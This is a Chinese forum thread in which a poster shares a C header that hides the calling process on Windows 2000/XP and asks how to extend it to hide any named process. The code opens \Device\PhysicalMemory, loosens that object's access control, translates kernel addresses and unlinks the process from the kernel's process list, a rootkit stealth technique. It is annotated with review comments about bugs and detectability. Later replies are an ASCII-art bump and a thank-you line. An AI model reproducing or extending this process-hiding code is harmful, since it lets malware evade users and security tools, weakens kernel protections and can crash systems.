我是一VC爱好者,近来研究Win2K/WinXP下进程的隐藏,找到了下面一段代码,可以隐藏程序本身所在进程,但是我想通过一个名称,比如“QQ.exe”来隐藏进程,而不仅仅局限在隐藏程序本身的进程,由于对系统内核不了解,又不懂汇编,看了很久也没搞明白该怎么改,这两天翻阅资料无数仍无收获,请各位革命老前辈指点指点我,在此不胜感激!最后感谢每一位来捧场的朋友!代码如下://///////////////////////////////////////////////////////////////////////////
//HideProcess.h
#include<windows.h>
#include<Accctrl.h>
#include<Aclapi.h>
/*
 * Native-API (ntdll) declarations this header relies on. They mirror the NT
 * DDK definitions but are redeclared here so the file builds against the
 * user-mode SDK alone.
 */
#define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)            /* non-negative NTSTATUS == success */
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)     /* not referenced by the code shown */
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)            /* tested in OpenPhysicalMemory() */
/* NTSTATUS is typedef'd after the macros that cast to it; that is fine because
 * macro bodies are only expanded at their point of use. */
typedef LONG NTSTATUS;
/* Not referenced by the code shown; kept for completeness of the native types. */
typedef struct _IO_STATUS_BLOCK 
{
    NTSTATUS Status;
    ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
/* Counted wide string used by the native API; filled by RtlInitUnicodeString. */
typedef struct _UNICODE_STRING 
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
/* OBJECT_ATTRIBUTES.Attributes flags. The code shown always passes 0
 * (OpenPhysicalMemory()), so these are informational here. */
#define OBJ_INHERIT                0x00000002L
#define OBJ_PERMANENT              0x00000010L
#define OBJ_EXCLUSIVE              0x00000020L
#define OBJ_CASE_INSENSITIVE       0x00000040L
#define OBJ_OPENIF                 0x00000080L
#define OBJ_OPENLINK               0x00000100L
#define OBJ_KERNEL_HANDLE          0x00000200L
#define OBJ_VALID_ATTRIBUTES       0x000003F2L
/* Object-open descriptor; filled field by field in OpenPhysicalMemory(). */
typedef struct _OBJECT_ATTRIBUTES 
{
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
/* Signature of ntdll!ZwOpenSection (opens a named section object by
 * OBJECT_ATTRIBUTES); resolved at run time by InitNTDLL(). */
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes
    );
/* Signature of ntdll!RtlInitUnicodeString (initialises a UNICODE_STRING from
 * a NUL-terminated wide string); resolved at run time by InitNTDLL(). */
typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
    );
/* Function pointers resolved from ntdll.dll by InitNTDLL(); NULL before that. */
RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;
HMODULE g_hNtDLL = NULL;             /* ntdll.dll handle, owned by InitNTDLL()/CloseNTDLL() */
PVOID g_pMapPhysicalMemory = NULL;   /* view of the kernel page-directory page mapped by OpenPhysicalMemory();
                                        passed to LinearToPhys() as the table base by GetData()/SetData() */
HANDLE g_hMPM = NULL;                /* \Device\PhysicalMemory section handle from OpenPhysicalMemory() */
OSVERSIONINFO g_osvi;                /* filled by OpenPhysicalMemory(); dwMinorVersion selects the 2K/XP
                                        offsets in YHideProcess() */
/* NOTE(review): these are non-static definitions inside a header; including
 * the header from more than one translation unit produces duplicate-symbol
 * link errors. */
//---------------------------------------------------------------------------
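/**
 * Load ntdll.dll and resolve the two native-API entry points this file uses
 * (RtlInitUnicodeString, ZwOpenSection) into the file-scope pointers.
 *
 * @return TRUE on success. FALSE if ntdll.dll cannot be loaded or either
 *         export is missing; in that case the library is unloaded again and
 *         the globals are reset to NULL so nothing is left half-initialised.
 */
BOOL InitNTDLL()
{
    g_hNtDLL = LoadLibrary("ntdll.dll");
    if (NULL == g_hNtDLL)
    {
        return FALSE;
    }

    RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");
    ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");

    // A missing export would leave a NULL function pointer that
    // OpenPhysicalMemory() calls unconditionally; fail here instead.
    if (NULL == RtlInitUnicodeString || NULL == ZwOpenSection)
    {
        FreeLibrary(g_hNtDLL);
        g_hNtDLL = NULL;
        RtlInitUnicodeString = NULL;
        ZwOpenSection = NULL;
        return FALSE;
    }

    return TRUE;
}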
//---------------------------------------------------------------------------
/*
 * Release the ntdll.dll handle taken by InitNTDLL() and clear g_hNtDLL.
 * Safe to call when nothing was loaded: a NULL handle is simply skipped.
 * The function pointers resolved by InitNTDLL() are left as they are.
 */
VOID CloseNTDLL()
{
    HMODULE hModule = g_hNtDLL;
    g_hNtDLL = NULL;                 /* cleared unconditionally, as before */
    if (hModule != NULL)
    {
        FreeLibrary(hModule);
    }
}
//---------------------------------------------------------------------------
/*
 * Grant the calling user SECTION_MAP_WRITE on the section referred to by
 * hSection by appending one GRANT_ACCESS ACE to its DACL. Called from
 * OpenPhysicalMemory() when opening \Device\PhysicalMemory for writing is
 * denied; hSection is expected to have been opened with READ_CONTROL|WRITE_DAC.
 *
 * NOTE(review): the opening brace of the function body is missing from this
 * listing (the final "}}" closes the last if and the function).
 * NOTE(review): none of the three error branches returns. A failed
 * GetSecurityInfo still reaches SetEntriesInAcl with pDacl == NULL, a failed
 * SetEntriesInAcl still reaches SetSecurityInfo with pNewDacl == NULL, and on
 * the success path pSD and pNewDacl are never LocalFree'd.
 * The DACL change on the \Device\PhysicalMemory object is the durable
 * artefact this leaves behind. From Windows Server 2003 SP1 onward user-mode
 * opens of that object are refused, so this path does not apply there.
 */
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection) 

    PACL pDacl                  = NULL; 
    PSECURITY_DESCRIPTOR pSD    = NULL; 
    PACL pNewDacl               = NULL; 
    
    /* Current DACL; pDacl points into the descriptor returned in pSD. */
    DWORD dwRes = GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,&pDacl,NULL,&pSD);
    if(ERROR_SUCCESS != dwRes)
    {
        /* NOTE(review): no return here; execution falls through with pDacl == NULL. */
        if(pSD) 
        {
            LocalFree(pSD); 
        }
        if(pNewDacl) 
        {
            LocalFree(pNewDacl); 
        }
    }
    /* One ACE: SECTION_MAP_WRITE for the caller. "CURRENT_USER" is the special
     * trustee name SetEntriesInAcl accepts for the calling user; note the string
     * literal is assigned to LPTSTR without a cast. */
    EXPLICIT_ACCESS ea; 
    RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); 
    ea.grfAccessPermissions = SECTION_MAP_WRITE; 
    ea.grfAccessMode = GRANT_ACCESS; 
    ea.grfInheritance= NO_INHERITANCE; 
    ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; 
    ea.Trustee.TrusteeType = TRUSTEE_IS_USER; 
    ea.Trustee.ptstrName = "CURRENT_USER"; 
    dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
    
    if(ERROR_SUCCESS != dwRes)
    {
        /* NOTE(review): again no return; SetSecurityInfo below then receives pNewDacl == NULL. */
        if(pSD) 
        {
            LocalFree(pSD); 
        }
        if(pNewDacl) 
        {
            LocalFree(pNewDacl); 
        }
    }
    /* Install the merged DACL on the kernel object. */
    dwRes = SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL);
    
    if(ERROR_SUCCESS != dwRes)
    {
        if(pSD) 
        {
            LocalFree(pSD); 
        }
        if(pNewDacl) 
        {
            LocalFree(pNewDacl); 
        }
    }
    /* NOTE(review): on success pSD and pNewDacl leak. */
} 
//---------------------------------------------------------------------------
/*
 * Open \Device\PhysicalMemory read/write and map the 4 KiB physical page that
 * holds the kernel page directory into g_pMapPhysicalMemory.
 *
 * Side effects: fills g_osvi (read again by YHideProcess()), sets g_hMPM and
 * g_pMapPhysicalMemory. Requires InitNTDLL() to have resolved
 * RtlInitUnicodeString and ZwOpenSection.
 * @return the section handle, or NULL on failure or on any OS other than
 *         major version 5 / minor 0 or 1.
 *
 * The page-directory physical address is hard-coded per build (0x30000 on
 * 2000, 0x39000 on XP, per the author's "2k"/"xp" comments). Nothing checks
 * that the kernel is 32-bit non-PAE, which the masks in LinearToPhys()
 * assume — TODO confirm.
 * NOTE(review): in the ACCESS_DENIED retry the READ_CONTROL|WRITE_DAC open is
 * not status-checked before its handle is used; and when MapViewOfFile fails
 * the function returns NULL but leaves g_hMPM open.
 */
HANDLE OpenPhysicalMemory()
{
    NTSTATUS status;
    UNICODE_STRING physmemString;
    OBJECT_ATTRIBUTES attributes;
    ULONG PhyDirectory;
    g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx (&g_osvi);
    if (5 != g_osvi.dwMajorVersion)
    {
        return NULL;
    }
    /* Physical address of the kernel page directory for the supported builds. */
    switch(g_osvi.dwMinorVersion)
    {
        case 0:
            PhyDirectory = 0x30000;
            break; //2k
        case 1:
            PhyDirectory = 0x39000;
            break; //xp
        default:
            return NULL;
    }
    RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");
    attributes.Length                    = sizeof(OBJECT_ATTRIBUTES);
    attributes.RootDirectory             = NULL;
    attributes.ObjectName                = &physmemString;
    attributes.Attributes                = 0;      /* none of the OBJ_* flags */
    attributes.SecurityDescriptor        = NULL;
    attributes.SecurityQualityOfService  = NULL;
    status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes); 
    /* Write access denied: reopen for DAC editing, widen the DACL, then retry. */
    if(status == STATUS_ACCESS_DENIED)
    { 
        status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);   /* status not checked */
        SetPhyscialMemorySectionCanBeWrited(g_hMPM); 
        CloseHandle(g_hMPM);
        status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes); 
    }
    if(!NT_SUCCESS(status)) 
    {
        return NULL;
    }
    /* Map one page at the page-directory physical address. */
    g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory, 0x1000);
    if( g_pMapPhysicalMemory == NULL )
    {
        return NULL;   /* NOTE(review): g_hMPM stays open here */
    }
    return g_hMPM;
}
//---------------------------------------------------------------------------
/*
 * Translate a kernel virtual address to a physical address by walking the
 * two-level x86 page tables.
 *
 * @param BaseAddress  mapped view of the page directory (g_pMapPhysicalMemory).
 * @param addr         virtual address to translate.
 * @return the physical address, or 0 when the PDE or PTE is not present.
 *
 * Bits 31..22 of addr index the directory. If the entry's bit 7 (0x80) is set
 * it maps one 4 MiB page and the low 22 bits of addr are the offset; otherwise
 * the page table the entry points to is mapped from g_hMPM and indexed by
 * bits 21..12. Pointers are carried in ULONG, so this is 32-bit only.
 *
 * NOTE(review): the MapViewOfFile result is dereferenced without a NULL check
 * (a failed map would fault), and a return of 0 cannot be told apart from a
 * translation that genuinely yields physical address 0.
 */
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
    ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr;
    PGDE = BaseAddress[VAddr>>22];
    if (0 == (PGDE&1))                       /* present bit clear */
    {
        return 0;
    }
    ULONG tmp = PGDE & 0x00000080;           /* large-page bit */
    if (0 != tmp)
    {
        PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
    }
    else
    {
        /* 4 == FILE_MAP_READ; map the page table's 4 KiB frame. */
        PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
        PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
        
        if (0 == (PTE&1))                    /* present bit clear; note: view not unmapped */
        {
            return 0;
        }
        PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
        UnmapViewOfFile((PVOID)PGDE);
    }
    return (PVOID)PAddr;
}
//---------------------------------------------------------------------------
/*
 * Read one 32-bit value at kernel virtual address addr through the physical
 * memory section: translate with LinearToPhys(), map the containing 4 KiB
 * frame, pick the dword, unmap.
 *
 * @return the value read, or 0 if the frame could not be mapped.
 * NOTE(review): a failed translation (LinearToPhys() returning 0) is not
 * detected; the function then maps physical frame 0 and returns whatever is
 * there. The view is opened read/write although only a read is performed.
 */
ULONG GetData(PVOID addr)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
    PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
    
    if (0 == tmp)
    {
        return 0;
    }
    ULONG ret = tmp[(phys & 0xFFF)>>2];      /* dword index within the frame */
    UnmapViewOfFile(tmp);
    return ret;
}
//---------------------------------------------------------------------------
/*
 * Write one 32-bit value to kernel virtual address addr through the physical
 * memory section (translate, map the frame, store, unmap).
 *
 * @return TRUE on success, FALSE if the frame could not be mapped.
 * NOTE(review): as in GetData(), a translation failure (phys == 0) is not
 * detected and would turn into a write to physical frame 0.
 */
BOOL SetData(PVOID addr,ULONG data)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
    PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
    if (0 == tmp)
    {
        return FALSE;
    }
    tmp[(phys & 0xFFF)>>2] = data;           /* dword index within the frame */
    UnmapViewOfFile(tmp);
    return TRUE;
}
//---------------------------------------------------------------------------
/*
 * Unhandled-exception filter: ends the process silently instead of letting
 * the default fault dialog appear. Referenced only by the commented-out
 * SetUnhandledExceptionFilter(exeception) call in YHideProcess().
 */
long __stdcall exeception(struct _EXCEPTION_POINTERS *info)
{
    (void)info;                          /* nothing is inspected: every fault ends the process */
    ExitProcess(0);
    return EXCEPTION_EXECUTE_HANDLER;    /* == 1; never reached, ExitProcess does not return */
}


  1.   

    //---------------------------------------------------------------------------
    /*
     * Unlink the calling process from the kernel's process list by writing to
     * kernel memory through \Device\PhysicalMemory.
     *
     * Steps (all kernel reads/writes go through GetData()/SetData()):
     *   1. InitNTDLL() and OpenPhysicalMemory(); either failing returns FALSE.
     *   2. Read the current thread block from 0xFFDFF124 ("kteb" in the
     *      author's comment) and its process block from thread+0x44 ("kpeb").
     *   3. Read the Flink/Blink pair of the process's list entry at
     *      +0xa0/+0xa4 (2000) or +0x88/+0x8c (XP), selected by the
     *      g_osvi.dwMinorVersion that OpenPhysicalMemory() filled in.
     *   4. Store Blink into the successor's Blink (fw+4) and Flink into the
     *      predecessor's Flink (bw): a plain doubly-linked-list unlink. The
     *      process's own entry keeps pointing at its former neighbours.
     *   5. Close the section handle and unload ntdll. Returns TRUE after
     *      step 2 regardless of whether either SetData() succeeded.
     *
     * Offsets are hard-coded per build and 32-bit only. Only this one list is
     * edited, so the process remains visible through every other kernel view
     * (its threads keep running and nothing else that refers to it changes);
     * that discrepancy is what cross-view process enumeration detects. When
     * the process later exits, the kernel unlinks an entry whose neighbours
     * no longer point back to it, which can crash the system.
     *
     * NOTE(review): in the pasted listing the `if (!InitNTDLL())` and the
     * `ULONG fw, bw;` declaration had been swallowed into the preceding
     * comment lines; they are restored to their own lines here. fw/bw are
     * assigned only inside the two version branches, so compilers warn about
     * possibly-uninitialised use, although OpenPhysicalMemory() has already
     * rejected every other minor version by this point.
     */
    BOOL YHideProcess()
    {
    //    SetUnhandledExceptionFilter(exeception);
        if (!InitNTDLL())
        {
            return FALSE;
        }
        if (!OpenPhysicalMemory())
        {
            return FALSE;
        }
        ULONG thread  = GetData((PVOID)0xFFDFF124); //kteb
        ULONG process = GetData(PVOID(thread + 0x44)); //kpeb
        ULONG fw, bw;
    //2K
        if (0 == g_osvi.dwMinorVersion)
        {
            fw = GetData(PVOID(process + 0xa0));
            bw = GetData(PVOID(process + 0xa4));        
        }
    //XP
        if (1 == g_osvi.dwMinorVersion)
        {
            fw = GetData(PVOID(process + 0x88));
            bw = GetData(PVOID(process + 0x8c));
        }
            
        /* Unlink: neighbours now point past this entry. Return values ignored. */
        SetData(PVOID(fw + 4), bw);
        SetData(PVOID(bw), fw);
        CloseHandle(g_hMPM);
        CloseNTDLL();
        return TRUE;
    }
    /*
     * One-shot wrapper: runs YHideProcess() at most once per process.
     * NOTE(review): bHide is set before the attempt, so a failed first call is
     * never retried; every later call returns TRUE without doing anything.
     */
    BOOL HideProcess()
    {
    static BOOL bHide = FALSE;
    if (!bHide)
    {
    bHide = TRUE;
    if(!YHideProcess())
    {
    return FALSE;
    }
    }
    return TRUE;
    }
      

  2.   

    隐藏程序本身进程时只需#include "HideProcess.h" 并调用“HideProcess()”就可以了,可是我非常需要他能做到隐藏任意进程(知道那个进程的名称的情况下),可是我没有搞明白这段程序到底是在哪里把自身进程给隐藏的,一点也没看懂,无奈水平太低,请各位革命老前辈不吝赐教,我倾囊送分!
      

  3.   

    ................888888888888888888888888 
    ...............8888:::8888888888888888888888888 
    .............8888::::::8888888888888888888888888888 
    ............88::::::::888:::8888888888888888888888888 
    ..........88888888::::8:::::::::::88888888888888888888 
    ........888.8::888888::::::::::::::::::88888888888...888 
    ...........88::::88888888::::顶::::::::::88888888888....8 
    .........888888888888888888:顶:::::::::::8888888888888 
    ........88888888888888888888::::::::::::顶88888888888888 
    ........8888888888888888888888:::::::::顶8888888888888888 
    .........8888888888888888888888:::::::顶888888888888888888 
    ........8888888888888888::88888::::::顶88888888888888888888 
    ......88888888888888888:::88888:::::顶888888888888888...8888 
    .....88888888888888888:::88888::::顶::;o*顶*o;888888888....88 
    ....88888888888888888:::8888:::::顶:::::::::::88888888....8 
    ...88888888888888888::::88::::::顶:;:::::::::::888888888 
    ..8888888888888888888:::8::::::顶::aAa::::::::顶8888888888.......8 
    ..88...8888888888::88::::8::::顶:::::::::::::888888888888888.8888 
    .88..88888888888:::8:::::::::顶::::::::::;::88:88888888888888888 
    .8..8888888888888:::::::::::顶::"@@@@@@@"::::8w8888888888888888 
    ..88888888888:888::::::::::顶:::::"@a@":::::顶8i888888888888888 
    .8888888888::::88:::::::::顶88:::::::::::::顶88z88888888888888888 
    8888888888:::::8:::::::::顶88888:::::::::顶顶888!888888888888888888 
    888888888:::::8:::::::::顶8888888顶A顶顶顶A顶V顶顶888*88888888...88888888 
    888888.顶:::::::::::::::顶888888888:::::::顶顶88888888888888...8888888 
    8888...顶::::::::::::::顶88888888888::::::顶顶888888888888888....88888 
    .888...顶:::::::::::::顶8888888888888顶:::::顶顶888888888888888....8888 
    ..888..顶::::::::::::顶8888:888888888888::::顶::顶顶88888.888888...8888 
    ...88..顶::::::::::::8888:88888888888888888::::::顶顶8...88888...888 
    ...88..顶::::::::::8888顶::88888::888888888888:::::::顶顶88888....88 
    ...8...顶顶::::::::8888顶:::8888:::::888888888888::::::::顶顶8.....4 
    .......8顶:::::::8888顶:::::888:::::::88:::8888888::::::::顶顶....2 
    ......88顶顶:::::8888顶:::::::88::::::::8:::::888888:::顶:::::顶 
    .....8888顶:::::888顶顶::::::::8:::::::::::顶::::8888::::顶::::顶 
    ....88888顶:::::88:顶::::::::::8:::::::::::顶:::8888::::::顶::顶 
    ...88.888顶顶:::888:顶:::::::::::::::::::::::顶:8888:::::::::顶: 
    ...8.88888顶:::88::顶:::::::::::::::::::::::顶顶:88::::::::::::顶 
    .....88888顶:::88::顶::::::::::*88*::::::::::顶:88::::::::::::::顶 
    ....888888顶:::88::顶:::::::::88@@88:::::::::顶::88::::::::::::::顶 
    ....888888顶顶::88::顶顶::::::::88@@88:::::::::顶:::8::::::::::::::*8 
    ....88888..顶:::8::顶顶:::::::::*88*::::::::::顶:::::::::::::::::88@@ 
    ....8888...顶顶::::::顶顶:::::::::::::::::::::顶顶:::::::::::::::::88@@ 
    .....888....顶:::::::顶顶:::::::::::::::::::顶顶::顶::::::::::::::::*8 
    .....888....顶顶:::::::顶顶顶::::::::::::::::顶顶:::顶顶:::::::::::::::顶 
    ......88.....顶::::::::顶顶顶顶:::::::::::顶顶顶顶:::::顶顶::::::::::::顶顶 
    .......88....顶顶:::::::::顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶::::::::顶顶顶 
    ........88....顶顶::::::::::::顶顶顶顶顶顶顶::::::::::::::顶顶顶顶顶顶 
    .........88...8顶顶::::::::::::::::::::::::::::::::::顶顶顶顶顶顶 
    ..........8...88顶顶::::::::::::::::::::::顶:::顶::::::::顶顶 
    ..............888顶顶::::::::::::::::::顶顶::::::顶顶::::::顶顶 
    .............88888顶顶:::::::::::::::顶顶顶:::::::顶顶:::::顶顶 
    .............888888顶顶:::::::::::::顶顶顶:::::::::顶顶顶:::顶 
    ............88888888顶顶:::::::::::顶顶顶:::::::::::顶顶:::顶 
    ...........88.8888888顶:::::::::顶顶顶::::::::::::::顶:::顶 
    ...........8..888888.顶:::::::顶顶:::::::::::::::::顶:::顶: 
    ..............888888.顶::::::顶:::::::::::::::::::顶:::顶顶 
    .............888888..顶:::::顶::::::::::::::::::::::::顶:顶 
    .............888888..顶:::::顶:::::::::@::::::::::::::顶::顶 
    .............88888...顶::::::::::::::@@:::::::::::::::顶::顶 
    ............88888...顶::::::::::::::@@@::::::::::::::::顶::顶 
    ...........88888...顶:::::::::::::::@@::::::::::::::::::顶::顶 
    ..........88888...顶:::::顶::::::::::@::::::::::顶顶:::::::顶:::顶 
    ..........8888...顶:::::顶:::::::::::::::::::::::顶顶:::::::顶:::顶 
    .........8888...顶:::::顶:::::::::::::::::::::::顶顶顶::::::::顶:::顶 
    ........888....顶:::::顶顶::::::::::::::::::::::顶顶顶:::::::::顶::::顶 
    ......8888....顶顶::::顶顶:::::::::::::::::::::顶顶顶顶:::::::::顶::顶:::顶 
    .....888......顶:::::顶::::::::::::::::::::顶顶顶::::::::::::顶::顶顶:::顶 
    ..8888.......顶顶:::::::::::::::::::::::::顶顶:::::::::::::顶顶::顶顶:::顶: 
    .............顶:::::::::::::::::::::::::顶:::::::::::::::顶顶::顶顶:::顶顶 
    ............顶顶::::::顶:::::::::::::::::::::::::::::::::::顶::顶顶:::顶顶 
    ............顶::::::::顶:::::::::::::::::::::::::::::::::::顶::顶:::顶顶 
    ...........顶顶:::::::::顶:::::::::::::顶:::::::::::::::::::::顶:顶:::顶顶 
    ...........顶:::::::::::顶88:::::::::顶:::::::::::::::::::::::顶顶::顶顶顶 
    ...........顶::::::::::::8888888888顶::::::::::::::::::::::::顶顶::顶顶 
    ...........顶:::::::::::::88888888顶:::::::::::::::::::::::::顶::顶顶 
    ...........顶::::::::::::::888888顶:::::::::::::::::::::::::顶::顶顶 
    ...........顶:::::::::::::::88888顶:::::::::::::::::::::::::顶:顶顶 
    ...........顶:::::::::::::::::88顶::::::::::::::::::::::::::顶顶顶 
    ...........顶:::::::::::::::::::顶::::::::::::::::::::::::::顶顶顶 
    ...........顶顶:::::::::::::::::顶::::::::::::::::::::::::::顶顶顶 
    ............顶:::::::::::::::::顶::::::::::::::::::::::::::顶顶顶 
    ............顶顶:::::::::::::::顶::::::::::::::::::::::::::顶顶顶 
    .............顶:::::::::::::::顶:::::::::::::::::::::::::顶顶顶 
    .............顶顶:::::::::::::顶:::::::::::::::::::::::::顶顶顶 
    ..............顶:::::::::::::顶::::::::::::::::::::::::顶顶顶 
    ..............顶顶:::::::::::顶::::::::::::::::::::::::顶顶顶 
    ...............顶:::::::::::顶:::::::::::::::::::::::顶顶顶 
    ...............顶顶:::::::::顶:::::::::::::::::::::::顶顶顶 
    ................顶:::::::::顶::::::::::::::::::::::顶顶顶 
    ................顶顶:::::::顶::::::::::::::::::::::顶顶顶 
    .................顶顶::::::顶:::::::::::::::::::::顶顶顶 
    .................顶顶:::::顶:::::::::::::::::::::顶顶顶 
    ..................顶顶::::顶::::::::::::::::::::顶顶顶 
    ..................顶顶:::顶::::::::::::::::::::顶顶顶 
    ...................顶顶::顶:::::::::::::::::::顶顶顶 
    ...................顶顶:顶:::::::::::::::::::顶顶顶 
    ....................顶顶顶::::::::::::::::::顶顶顶 
    ....................顶顶::::::::::::::::::顶顶顶 
    .....................顶:::::::::::::::::顶顶顶 
    ....................顶顶::::::::::::::::顶顶顶 
    ....................顶顶:::::::::::::::顶顶顶 
    ....................顶顶::::顶:::::::::顶顶顶: 
    ....................顶顶顶::::顶顶:::::::顶顶顶顶 
    .....................顶顶顶:::::::::::顶顶顶:顶 
    .....................顶顶顶:::顶:::::::顶:顶:顶 
    ......................顶顶::顶顶顶顶:::::::顶:顶 
    ......................顶顶::顶顶顶::::::::顶:顶 
    ......................顶顶顶::顶顶::::::::顶:顶 
    .......................顶顶::顶顶:::::::::顶:顶 
    .......................顶顶::顶顶::::::::::顶:顶 
    .......................顶顶:::顶:::::::::::顶顶 
    .......................顶顶顶:::::::::::::::顶: 
    .......................顶顶顶:::::::::::::::顶: 
    .......................顶顶顶::::::::::::::::顶 
    .......................顶顶顶::::::::::::::::顶 
    .......................顶顶顶::::::::::::::::顶顶 
    ........................顶顶::::::::::::::::顶顶 
    ........................顶顶顶:::::::::::::::顶顶 
    ........................顶顶顶:::::::::::::::顶顶 
    ........................顶顶顶:::::::::::::::顶
      

  4.   

    [email protected]@sina.com多谢好心人,祝好人一生平安!